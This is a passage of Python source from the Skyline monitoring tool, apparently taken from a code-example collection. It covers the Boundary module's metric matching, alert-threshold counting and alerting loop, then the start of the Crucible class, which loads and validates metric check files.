            self.check_if_parent_is_alive()

            try:
                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(i)))
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
            except Exception as e:
                exceptions['Other'] += 1
                logger.error("redis data error: " + traceback.format_exc())
                logger.error("error: %e" % e)

            base_name = metric_name.replace(FULL_NAMESPACE, '', 1)

            # Determine the metrics BOUNDARY_METRICS metric tuple settings
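            # The indexing below assumes an 8-element tuple of the form
            # (pattern, algorithm, expiration_time, min_average, min_average_seconds,
            #  trigger, alert_threshold, alerters), e.g. (hypothetical):
            # ('stats.web01.requests', 'less_than', 3600, 0, 1200, 10, 1, 'smtp')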
            for metrick in BOUNDARY_METRICS:
                CHECK_MATCH_PATTERN = metrick[0]
                check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                pattern_match = check_match_pattern.match(base_name)
                metric_pattern_matched = False
                if pattern_match:
                    metric_pattern_matched = True
                    algo_pattern_matched = False
                    for algo in boundary_algorithms:
                        for metric in BOUNDARY_METRICS:
                            CHECK_MATCH_PATTERN = metric[0]
                            check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                            pattern_match = check_match_pattern.match(base_name)
                            if pattern_match:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1]))
                                metric_expiration_time = False
                                metric_min_average = False
                                metric_min_average_seconds = False
                                metric_trigger = False
                                algorithm = False
                                algo_pattern_matched = True
                                algorithm = metric[1]
                                try:
                                    if metric[2]:
                                        metric_expiration_time = metric[2]
                                except:
                                    metric_expiration_time = False
                                try:
                                    if metric[3]:
                                        metric_min_average = metric[3]
                                except:
                                    metric_min_average = False
                                try:
                                    if metric[4]:
                                        metric_min_average_seconds = metric[4]
                                except:
                                    metric_min_average_seconds = 1200
                                try:
                                    if metric[5]:
                                        metric_trigger = metric[5]
                                except:
                                    metric_trigger = False
                                try:
                                    if metric[6]:
                                        alert_threshold = metric[6]
                                except:
                                    alert_threshold = False
                                try:
                                    if metric[7]:
                                        metric_alerters = metric[7]
                                except:
                                    metric_alerters = False
                            if metric_pattern_matched and algo_pattern_matched:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug - added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm))
                                discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm])

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing discover_run_metrics')
            for discover_run_metric in discover_run_metrics:
                logger.info('debug - discover_run_metrics - %s' % str(discover_run_metric))
            logger.info('debug - build unique boundary metrics to analyze')

        # Determine the unique set of metrics to run
        run_metrics = unique_noHash(discover_run_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing run_metrics')
            for run_metric in run_metrics:
                logger.info('debug - run_metrics - %s' % str(run_metric))

        # Distill timeseries strings and submit to run_selected_algorithm
        for metric_and_algo in run_metrics:
            self.check_if_parent_is_alive()

            try:
                raw_assigned_id = metric_and_algo[0]
                metric_name = metric_and_algo[1]
                base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                metric_expiration_time = metric_and_algo[2]
                metric_min_average = metric_and_algo[3]
                metric_min_average_seconds = metric_and_algo[4]
                metric_trigger = metric_and_algo[5]
                alert_threshold = metric_and_algo[6]
                metric_alerters = metric_and_algo[7]
                algorithm = metric_and_algo[8]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id)))

                raw_series = raw_assigned[metric_and_algo[0]]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id)))

                autoaggregate = False
                autoaggregate_value = 0

                # Determine if the namespace is to be aggregated
                if BOUNDARY_AUTOAGGRERATION:
                    for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS:
                        autoaggregate = False
                        autoaggregate_value = 0
                        CHECK_MATCH_PATTERN = autoaggregate_metric[0]
                        base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            autoaggregate = True
                            autoaggregate_value = autoaggregate_metric[1]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate)))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info(
                        'debug - analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % (
                            metric_name, str(metric_expiration_time),
                            str(metric_min_average),
                            str(metric_min_average_seconds),
                            str(metric_trigger), str(alert_threshold),
                            metric_alerters, autoaggregate,
                            autoaggregate_value, algorithm)
                    )
                    # Dump the timeseries data to a file
                    timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm
                    self.mkdir_p(timeseries_dump_dir)
                    timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json"
                    with open(timeseries_dump_file, 'w+') as f:
                        f.write(str(timeseries))

                # Check if a metric has its own unique BOUNDARY_METRICS alert
                # tuple, this allows us to paint an entire metric namespace with
                # the same brush AND paint a unique metric or namespace with a
                # different brush or scalpel
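                # e.g. (hypothetical) a wildcard tuple ('stats.*', 'less_than', ...) paints a
                # whole namespace, while ('stats.web01.requests', 'less_than', ...) overrides
                # the behaviour for that single metric only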
                has_unique_tuple = False
                run_tupple = False
                boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters)
                wildcard_namespace = True
                for metric_tuple in BOUNDARY_METRICS:
                    if not has_unique_tuple:
                        CHECK_MATCH_PATTERN = metric_tuple[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            if metric_tuple[0] == base_name:
                                wildcard_namespace = False
                            if not has_unique_tuple:
                                if boundary_metric_tuple == metric_tuple:
                                    has_unique_tuple = True
                                    run_tupple = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('unique_tuple:')
                                        logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                                        logger.info('metric_tuple: %s' % str(metric_tuple))

                if not has_unique_tuple:
                    if wildcard_namespace:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace:')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                        run_tupple = True
                    else:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace: BUT WOULD NOT RUN')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple)

                if run_tupple:
                    # Submit the timeseries and settings to run_selected_algorithm
                    anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm(
                        timeseries, metric_name,
                        metric_expiration_time,
                        metric_min_average,
                        metric_min_average_seconds,
                        metric_trigger,
                        alert_threshold,
                        metric_alerters,
                        autoaggregate,
                        autoaggregate_value,
                        algorithm
                    )
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug - analysed - %s' % (metric_name))
                else:
                    anomalous = False
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug - more unique metric tuple not analysed - %s' % (metric_name))

                # If it's anomalous, add it to list
                if anomalous:
                    anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]
                    self.anomalous_metrics.append(anomalous_metric)
                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info("exceptions['Other'] traceback follows:")
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Reset boundary_metrics
            boundary_metrics = []

            # Build boundary metrics
            for metric_name in unique_metrics:
                for metric in BOUNDARY_METRICS:
                    CHECK_MATCH_PATTERN = metric[0]
                    check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    pattern_match = check_match_pattern.match(base_name)
                    if pattern_match:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - boundary metric - pattern MATCHED - " + metric[0] + " | " + base_name)
                        boundary_metrics.append([metric_name, metric[1]])

            if ENABLE_BOUNDARY_DEBUG:
                logger.info("debug - boundary metrics - " + str(boundary_metrics))

            if len(boundary_metrics) == 0:
                logger.info('no metrics matched BOUNDARY_METRICS. check your settings - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.BOUNDARY_PROCESSES + 1):
                if i > len(boundary_metrics):
                    logger.info('WARNING: skyline boundary is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, boundary_metrics))
                pids.append(p)
                p.start()

            # Wait for all spawned processes to finish
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.BOUNDARY_ENABLE_ALERTS:
                for anomalous_metric in self.anomalous_metrics:
                    datapoint = str(anomalous_metric[0])
                    metric_name = anomalous_metric[1]
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    expiration_time = str(anomalous_metric[2])
                    metric_trigger = str(anomalous_metric[5])
                    alert_threshold = int(anomalous_metric[6])
                    metric_alerters = anomalous_metric[7]
                    algorithm = anomalous_metric[8]
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info("debug - anomalous_metric - " + str(anomalous_metric))

                    # Determine how many times has the anomaly been seen if the
                    # ALERT_THRESHOLD is set to > 1 and create a cache key in
                    # redis to keep count so that alert_threshold can be honored
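                    # e.g. with alert_threshold = 3 a key such as
                    # 'anomaly_seen.less_than.stats.web01.requests' (hypothetical) lives for
                    # (3 + 1) * 60 = 240 seconds and its msgpacked counter is incremented on
                    # each run; the alerters only fire once times_seen >= 3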
                    if alert_threshold == 0:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))

                    if alert_threshold == 1:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))

                    if alert_threshold > 1:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - alert_threshold - " + str(alert_threshold))
                        anomaly_cache_key_count_set = False
                        anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60
                        anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
                        try:
                            anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key)
                            if not anomaly_cache_key_count:
                                try:
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - redis no anomaly_cache_key - " + str(anomaly_cache_key))
                                    times_seen = 1
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - redis setex anomaly_cache_key - " + str(anomaly_cache_key))
                                    self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                    logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                                except Exception as e:
                                    logger.error('redis setex failed :: %s' % str(anomaly_cache_key))
                                    logger.error("couldn't set key: %s" % e)
                            else:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - redis anomaly_cache_key retrieved OK - " + str(anomaly_cache_key))
                                anomaly_cache_key_count_set = True
                        except:
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info("debug - redis failed - anomaly_cache_key retrieval failed - " + str(anomaly_cache_key))
                            anomaly_cache_key_count_set = False

                        if anomaly_cache_key_count_set:
                            unpacker = Unpacker(use_list=False)
                            unpacker.feed(anomaly_cache_key_count)
                            raw_times_seen = list(unpacker)
                            times_seen = int(raw_times_seen[0]) + 1
                            try:
                                self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                            except:
                                times_seen = 1
                                logger.error('set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen)))

                    # Alert the alerters if times_seen > alert_threshold
                    if times_seen >= alert_threshold:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug - times_seen %s is greater than or equal to alert_threshold %s" % (str(times_seen), str(alert_threshold)))
                        for alerter in metric_alerters.split("|"):
                            # Determine alerter limits
                            send_alert = False
                            alerts_sent = 0
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info("debug - checking alerter - %s" % alerter)
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determining alerter_expiration_time for settings")
                                alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter]
                                alerter_expiration_time = int(alerter_expiration_time_setting)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determined alerter_expiration_time from settings - %s" % str(alerter_expiration_time))
                            except:
                                # Set an arbitrary expiry time if not set
                                alerter_expiration_time = 160
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - could not determine alerter_expiration_time from settings")
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determining alerter_limit from settings")
                                alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter]
                                alerter_limit = int(alerter_limit_setting)
                                alerter_limit_set = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - determined alerter_limit from settings - %s" % str(alerter_limit))
                            except:
                                alerter_limit_set = False
                                send_alert = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - could not determine alerter_limit from settings")

                            # If the alerter_limit is set determine how many
                            # alerts the alerter has sent
                            if alerter_limit_set:
                                alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                try:
                                    alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key)
                                    if not alerter_sent_count_key_data:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key))
                                        alerts_sent = 0
                                        send_alert = True
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - alerts_sent set to %s" % str(alerts_sent))
                                            logger.info("debug - send_alert set to %s" % str(sent_alert))
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - redis alerter key retrieved, unpacking" + str(alerter_sent_count_key))
                                        unpacker = Unpacker(use_list=False)
                                        unpacker.feed(alerter_sent_count_key_data)
                                        raw_alerts_sent = list(unpacker)
                                        alerts_sent = int(raw_alerts_sent[0])
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - alerter %s alerts sent %s " % (str(alerter), str(alerts_sent)))
                                except:
                                    logger.info("No key set - %s" % alerter_sent_count_key)
                                    alerts_sent = 0
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - alerts_sent set to %s" % str(alerts_sent))
                                        logger.info("debug - send_alert set to %s" % str(send_alert))

                                if alerts_sent < alerter_limit:
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug - alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit)))
                                        logger.info("debug - send_alert set to %s" % str(send_alert))

                            # Send alert
                            alerter_alert_sent = False
                            if send_alert:
                                cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - checking cache_key - %s" % cache_key)
                                try:
                                    last_alert = self.redis_conn.get(cache_key)
                                    if not last_alert:
                                        try:
                                            self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0])))
                                            if ENABLE_BOUNDARY_DEBUG:
                                                logger.info('debug - key setex OK - %s' % (cache_key))
                                            trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                            alerter_alert_sent = True
                                        except Exception as e:
                                            logger.error('alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            logger.error("couldn't send alert: %s" % str(e))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug - cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key))
                                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                except:
                                    trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                            else:
                                trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

                            # Update the alerts sent for the alerter cache key,
                            # to allow for alert limiting
                            if alerter_alert_sent and alerter_limit_set:
                                try:
                                    alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                    new_alerts_sent = int(alerts_sent) + 1
                                    self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent)))
                                    logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                                except:
                                    logger.error('failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))

                    else:
                        # Always alert to syslog, even if alert_threshold is not
                        # breached or if send_alert is not True
                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
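                    # Each entry mirrors anomalous_metric above, so the output looks like
                    # (hypothetical):
                    # handle_data([[42.5, 'stats.web01.requests', 3600, 0, 1200, 10, 1, 'smtp', 'less_than']])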
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(boundary_metrics))
            logger.info('total analyzed    :: %d' % (len(boundary_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_analyzed', '%.2f' % (len(boundary_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'total_metrics', '%d' % len(boundary_metrics))
            for key, value in exceptions.items():
                send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'skyline.boundary.' + SERVER_METRIC_PATH + 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human
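                # e.g. if the canary timeseries spans 6 hours and this run took 30 seconds,
                # time_human = 6.0 and projected = 24 * 30 / 6 = 120 seconds for a full day of data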

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'duration', '%.2f' % time_human)
                self.send_graphite_metric('skyline.boundary.' + SERVER_METRIC_PATH + 'projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Only run once per minute
            seconds_to_run = int((time() - now))
            if seconds_to_run < 60:
                sleep_for_seconds = 60 - seconds_to_run
            else:
                sleep_for_seconds = 0
            if sleep_for_seconds > 0:
                logger.info('sleeping for %s seconds' % sleep_for_seconds)
                sleep(sleep_for_seconds)
Example no. 40
class Crucible(Thread):
    def __init__(self, parent_pid):
        """
        Initialize Crucible
        """
        super(Crucible, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.process_list = Manager().list()
        self.metric_variables = Manager().list()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)

    def check_if_parent_is_alive(self):
        """
        Check if the parent process is alive
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, run_timestamp, metric_check_file):
        """
        Assign a metric for a process to analyze.

        :param i: python process id
        :param run_timestamp: the epoch timestamp at which this process was called
        :param metric_check_file: full path to the metric check file

        :return: returns True

        """

        child_process_pid = os.getpid()
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('child_process_pid - %s' % str(child_process_pid))

        self.process_list.append(child_process_pid)

        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('processing metric check - %s' % metric_check_file)

        if not os.path.isfile(str(metric_check_file)):
            logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
            return

        check_file_name = os.path.basename(str(metric_check_file))
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_name - %s' % check_file_name)
        check_file_timestamp = check_file_name.split('.', 1)[0]
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_timestamp - %s' % str(check_file_timestamp))
        check_file_metricname_txt = check_file_name.split('.', 1)[1]
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname_txt - %s' % check_file_metricname_txt)
        check_file_metricname = check_file_metricname_txt.replace('.txt', '')
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname - %s' % check_file_metricname)
        check_file_metricname_dir = check_file_metricname.replace('.', '/')
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('check_file_metricname_dir - %s' % check_file_metricname_dir)
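        # e.g. a hypothetical check file named '1490001000.server1.cpu.user.txt' yields
        # check_file_timestamp '1490001000', check_file_metricname 'server1.cpu.user'
        # and check_file_metricname_dir 'server1/cpu/user'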

        metric_failed_check_dir = failed_checks_dir + '/' + check_file_metricname_dir + '/' + check_file_timestamp
        if settings.ENABLE_CRUCIBLE_DEBUG:
            logger.info('metric_failed_check_dir - %s' % metric_failed_check_dir)

        # failed_check_file = failed_checks_dir + '/' + check_file_name
        failed_check_file = metric_failed_check_dir + '/' + check_file_name

        # Load and validate metric variables
        try:
            metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
        except:
            logger.error('error :: failed to import metric variables from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            # TBD - a failed check Panorama update will go here, perhaps txt
            #       files are not the only "queue" that will be used, both, but
            #       Panorama, may be just a part of Skyline Flux, the flux DB
            #       would allow for a very nice, distributed "queue" and a
            #       distributed Skyline workforce...
            #       Any Skyline node could just have one role, e.g. lots of
            #       Skyline nodes running crucible only and instead of reading
            #       the local filesystem for input, they could read the Flux DB
            #       queue or both...
            return

        # Test metric variables
        # We use a pythonic methodology to test if the variables are defined,
        # this ensures that if any of the variables are not set for some reason
        # we can handle unexpected data or situations gracefully and try and
        # ensure that the process does not hang.
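        # A check file is expected to be a small file of plain python variable
        # assignments; a hypothetical example of the variables read below:
        #   metric = 'server1.cpu.user'
        #   value = '4.5'
        #   from_timestamp = '1490000000'
        #   metric_timestamp = '1490001000'
        #   algorithms = ['all']
        #   anomaly_dir = '/opt/skyline/crucible/server1/cpu/user/1490001000'
        #   graphite_metric = True
        #   run_crucible_tests = True
        #   added_by = 'analyzer'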

        # if len(str(metric_vars.metric)) == 0:
        # if not metric_vars.metric:
        try:
            metric_vars.metric
        except:
            logger.error('error :: failed to read metric variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            metric = str(metric_vars.metric)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - metric - %s' % metric)

        # if len(metric_vars.value) == 0:
        # if not metric_vars.value:
        try:
            metric_vars.value
        except:
            logger.error('error :: failed to read value variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            value = str(metric_vars.value)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - value - %s' % (value))

        # if len(metric_vars.from_timestamp) == 0:
        # if not metric_vars.from_timestamp:
        try:
            metric_vars.from_timestamp
        except:
            logger.error('error :: failed to read from_timestamp variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            from_timestamp = str(metric_vars.from_timestamp)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - from_timestamp - %s' % from_timestamp)

        # if len(metric_vars.metric_timestamp) == 0:
        # if not metric_vars.metric_timestamp:
        try:
            metric_vars.metric_timestamp
        except:
            logger.error('error :: failed to read metric_timestamp variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            metric_timestamp = str(metric_vars.metric_timestamp)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - metric_timestamp - %s' % metric_timestamp)

        # if len(metric_vars.algorithms) == 0:
        # if not metric_vars.algorithms:
        try:
            metric_vars.algorithms
        except:
            logger.error('error :: failed to read algorithms variable from check file - %s - setting to all' % (metric_check_file))
            algorithms = ['all']
        else:
            algorithms = []
            for i_algorithm in metric_vars.algorithms:
                algorithms.append(i_algorithm)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - algorithms - %s' % algorithms)

        # if len(metric_vars.anomaly_dir) == 0:
        # if not metric_vars.anomaly_dir:
        try:
            metric_vars.anomaly_dir
        except:
            logger.error('error :: failed to read anomaly_dir variable from check file -  %s' % (metric_check_file))
            fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
            return
        else:
            anomaly_dir = str(metric_vars.anomaly_dir)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - anomaly_dir - %s' % anomaly_dir)

        # if len(str(metric_vars.graphite_metric)) == 0:
        try:
            metric_vars.graphite_metric
        except:
            logger.info('failed to read graphite_metric variable from check file - setting to False')
            # yes this is a string
            graphite_metric = 'False'
        else:
            graphite_metric = str(metric_vars.graphite_metric)
            if settings.ENABLE_CRUCIBLE_DEBUG:
                logger.info('metric variable - graphite_metric - %s' % graphite_metric)

        # if len(str(metric_vars.run_crucible_tests)) == 0:
        try:
            metric_vars.run_crucible_tests
        except:
            logger.info('failed to read run_crucible_tests variable from check file - setting to False')
            # yes this is a string
            run_crucible_tests = 'False'
        else:
            run_crucible_tests = str(metric_vars.run_crucible_tests)
